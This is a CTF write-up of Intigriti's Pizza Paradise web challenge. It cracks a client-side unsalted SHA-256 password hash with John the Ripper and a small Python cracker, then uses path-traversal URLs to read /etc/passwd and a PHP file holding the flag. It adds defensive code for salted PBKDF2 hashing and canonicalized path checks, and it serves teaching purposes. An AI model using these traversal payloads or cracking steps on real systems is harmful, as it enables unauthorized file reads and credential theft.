Hacking Into Pizza Paradise: A CTF Journey to the Flag

SIDDHANT SHUKLA

Hey everyone! This is the write-up for the first web challenge of IntigritiCTF2k24. I hope you find it insightful and helpful in your CTF journey. Let’s dive right in!

1. Initial Reconnaissance

I started by reading the page source of the web application, but nothing useful stood out at first glance, so I moved on to the usual next check.

Exploring robots.txt

A quick look at the robots.txt file revealed an interesting disallowed path: /secret.html.

Visiting /secret.html showed a login panel.

2. Inspecting the Login Panel

I then checked the source code of the login panel. The interesting part is the inline JavaScript that validates the login entirely in the browser:

<script>
    // Client-side hashing with CryptoJS (loaded by the page); unsalted SHA-256.
    function hashPassword(password) {
        return CryptoJS.SHA256(password).toString();
    }

    function validate() {
        const username = document.getElementById("username").value;
        const password = document.getElementById("password").value;
        // getCredentials() is not defined in this inline script,
        // so it must come from one of the included JavaScript files.
        const credentials = getCredentials();
        const passwordHash = hashPassword(password);
        if (username === credentials.username && passwordHash === credentials.passwordHash) {
            return true;
        } else {
            alert("Invalid credentials!");
            return false;
        }
    }
</script>

This script hashes the entered password with SHA-256 in the browser and compares it with a stored hash returned by getCredentials(). Two things stand out: the check runs entirely client-side, so the expected username and password hash must be delivered to the browser, and getCredentials() is not defined in this inline script, so it has to live in one of the JavaScript files the page includes.

3. Discovering Hardcoded Credentials

By inspecting the network requests and response headers, I found the included script auth.js, and getCredentials() in it returned hardcoded credentials.

In auth.js, I found the username agent_1337 and the SHA-256 password hash 91a915b6bdcfb47045859288a9e2bd651af246f07a083f11958550056bed8eac.

4. Cracking the Hashed Password

The hash is a plain, unsalted SHA-256 digest. SHA-256 is a fast hash, so every candidate costs one hash computation and a wordlist attack is the obvious route. I used John the Ripper:

1. Save the hash to a file:

echo "91a915b6bdcfb47045859288a9e2bd651af246f07a083f11958550056bed8eac" > hash.txt

2. Run John against it in raw (unsalted) SHA-256 mode with the rockyou.txt wordlist:

john --format=raw-sha256 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

John cracked the hash: the password is intel420.

Now I had the username agent_1337 and the password intel420.
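
To show why this step works, and what would have stopped it, here is an added example (my own code, not the author's and not the challenge's). It runs the same dictionary attack John performed in pure Python against the hash from auth.js, using a small constructed stand-in for rockyou.txt so it runs offline, and then shows the server-side counterpart that defeats it: a per-user random salt with an iterated PBKDF2-HMAC-SHA256 hash. The wordlist, the PBKDF2 parameters and the function names are my choices, not anything from the challenge.

```python
import hashlib
import hmac
import os

# Hash copied from the write-up's auth.js (the challenge's stored credential).
TARGET_HASH = "91a915b6bdcfb47045859288a9e2bd651af246f07a083f11958550056bed8eac"

# Constructed stand-in for rockyou.txt so the script runs offline;
# against a real wordlist you would stream the file line by line.
WORDLIST = ["password", "123456", "pizza", "intel", "intel420", "letmein"]


def sha256_hex(candidate):
    """Unsalted SHA-256 hex digest, the same value CryptoJS.SHA256(password).toString() yields."""
    return hashlib.sha256(candidate.encode("utf-8")).hexdigest()


def crack_unsalted_sha256(target_hex, wordlist):
    """Dictionary attack: one SHA-256 per candidate, constant-time compare.

    Returns the plaintext on a hit, None when the wordlist is exhausted.
    """
    target_hex = target_hex.strip().lower()
    for word in wordlist:
        word = word.rstrip("\r\n")
        if hmac.compare_digest(sha256_hex(word), target_hex):
            return word
    return None


def slow_salted_hash(password, salt=None, iterations=600_000):
    """What a server should store instead: random per-user salt + PBKDF2-HMAC-SHA256.

    Returns (salt, digest); store both, never the raw password hash.
    """
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return salt, digest


def verify_slow_salted(password, salt, stored, iterations=600_000):
    """Recompute with the stored salt and compare in constant time."""
    _, digest = slow_salted_hash(password, salt, iterations)
    return hmac.compare_digest(digest, stored)


if __name__ == "__main__":
    # The unsalted hash falls to a plain wordlist: every candidate is one SHA-256.
    print("unsalted SHA-256 cracked:", crack_unsalted_sha256(TARGET_HASH, WORDLIST))

    # With a salt and 600k iterations each candidate costs 600k SHA-256 computations
    # per user, and precomputed hash tables are useless across users.
    salt, stored = slow_salted_hash("intel420")
    print("PBKDF2 verify correct password:", verify_slow_salted("intel420", salt, stored))
    print("PBKDF2 verify wrong password:", verify_slow_salted("intel421", salt, stored))
```

The attacker-side function is deliberately tiny; the point is that nothing about an unsalted fast hash slows it down, while the salted, iterated form multiplies the per-candidate cost and forces the work to be redone for every user. The deeper problem in the challenge, though, is not the hash choice but that the comparison happens in the browser at all: once the hash is served to the client, cracking is only a matter of time.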

5. Exploiting the File Download Functionality

After logging in, I noticed a “Download” button. Clicking it triggered the following GET request:

https://pizzaparadise.ctf.intigriti.io/topsecret_a9aedc6c39f654e55275ad8e65e316b3.php?download=/assets/images/topsecret1.png

The download path was restricted, though: pointing the download parameter somewhere else produced the error File path not allowed.

Since the restriction appeared to be about where the path starts rather than where it ends up, I tried a path traversal that keeps the /assets/images/ prefix and climbs out of it with ../ segments:

https://pizzaparadise.ctf.intigriti.io/topsecret_a9aedc6c39f654e55275ad8e65e316b3.php?download=/assets/images/../../../../../etc/passwd

This returned /etc/passwd, confirming that the check only looks at the prefix and never at the resolved path. The flag wasn't there, of course, but the traversal was now proven.

6. Final Path Traversal and Flag Retrieval

Looking at the URL again, the file name topsecret_a9aedc6c39f654e55275ad8e65e316b3.php is not an image but the PHP script that serves the download, and it sits at the web root. The download parameter is resolved relative to that same web root, so two ../ segments from /assets/images/ land exactly on the script. I requested it through the same traversal:

https://pizzaparadise.ctf.intigriti.io/topsecret_a9aedc6c39f654e55275ad8e65e316b3.php?download=/assets/images/../../topsecret_a9aedc6c39f654e55275ad8e65e316b3.php

Because the handler reads the file as raw bytes instead of executing it, this returned the PHP source, and the flag was sitting in it:

$flag = 'INTIGRITI{70p_53cr37_m15510n_c0mpl373}';
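
The check the handler needed is worth spelling out. The following is an added example written by me, not the challenge's PHP or the author's code, and it is in Python rather than PHP so it runs stand-alone. naive_is_allowed is my assumed reconstruction of a prefix-only check that behaves the way the error message above suggests; safe_resolve is the hardened version that canonicalizes the path and requires it to stay inside the allowed directory. The web root is a constructed temporary directory that mirrors the layout seen in the write-up (the download script at the root, the image under assets/images), and the three requests are the ones from this section.

```python
import os
import tempfile

ALLOWED_PREFIX = "/assets/images/"

# The three download parameters used in the write-up.
REQUESTS = [
    "/assets/images/topsecret1.png",
    "/assets/images/../../../../../etc/passwd",
    "/assets/images/../../topsecret_a9aedc6c39f654e55275ad8e65e316b3.php",
]


def naive_is_allowed(download_param):
    """Assumed reconstruction of the challenge's check: a bare string-prefix test.

    Every traversal payload that starts with /assets/images/ passes, because only
    the prefix is examined, never the location the path actually resolves to.
    """
    return download_param.startswith(ALLOWED_PREFIX)


def safe_resolve(webroot, download_param):
    """Hardened check: canonicalize first, then require containment.

    Returns the absolute filesystem path of a permitted file, or None if the
    request escapes the allowed directory or names something that is not a file.
    """
    allowed_dir = os.path.realpath(os.path.join(webroot, ALLOWED_PREFIX.lstrip("/")))
    # Strip the leading '/' so the parameter is joined under the web root rather
    # than being treated as an absolute filesystem path.
    candidate = os.path.realpath(os.path.join(webroot, download_param.lstrip("/")))
    # commonpath (not startswith) also rejects sibling directories such as
    # /assets/images-other/ that share a textual prefix with the allowed one.
    try:
        if os.path.commonpath([allowed_dir, candidate]) != allowed_dir:
            return None
    except ValueError:  # paths on different drives (Windows); treat as escape
        return None
    if not os.path.isfile(candidate):
        return None
    return candidate


def build_demo_webroot():
    """Constructed web root mirroring the challenge layout; contents are placeholders."""
    root = tempfile.mkdtemp(prefix="pizzaparadise_")
    os.makedirs(os.path.join(root, "assets", "images"))
    with open(os.path.join(root, "assets", "images", "topsecret1.png"), "wb") as f:
        f.write(b"\x89PNG placeholder image bytes")
    with open(os.path.join(root, "topsecret_a9aedc6c39f654e55275ad8e65e316b3.php"), "w") as f:
        f.write("<?php // constructed stand-in for the download handler ?>\n")
    return root


def evaluate(webroot, download_param):
    """Return (naive_allows, hardened_allows) for one download parameter."""
    return naive_is_allowed(download_param), safe_resolve(webroot, download_param) is not None


if __name__ == "__main__":
    root = build_demo_webroot()
    for param in REQUESTS:
        naive, hardened = evaluate(root, param)
        print(f"{param}\n    naive prefix check: {'allow' if naive else 'deny'}"
              f"    canonicalized check: {'allow' if hardened else 'deny'}")
```

Running it shows the naive check allowing all three requests and the canonicalized check allowing only the legitimate image. The order matters: resolve the path (realpath follows ../ and symlinks) and only then compare, because a check performed on the raw string has no idea where the path will end up. Note also that the PHP source was reachable at all only because the handler served arbitrary files from under the web root; keeping secrets out of files the web server can read is the second layer of defence.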

Conclusion

By following a few logical steps, I was able to crack the password, exploit the path traversal vulnerability, and retrieve the flag. The challenge combined two classic weaknesses: credentials shipped to the browser as an unsalted SHA-256 hash, which a wordlist cracks in no time, and a download endpoint that validated only the prefix of a user-supplied path instead of the path it resolves to, which lets ../ segments read any file the web server can reach, including its own source.

Flag: INTIGRITI{70p_53cr37_m15510n_c0mpl373}

I hope you enjoyed this write-up! Feel free to share your thoughts and let me know how you would have approached the challenge differently.

Want to connect?

Clap for this story if you enjoyed it and share your thoughts in the comments. Let’s connect on LinkedIn or X (formerly Twitter) to discuss more bug hunting adventures!
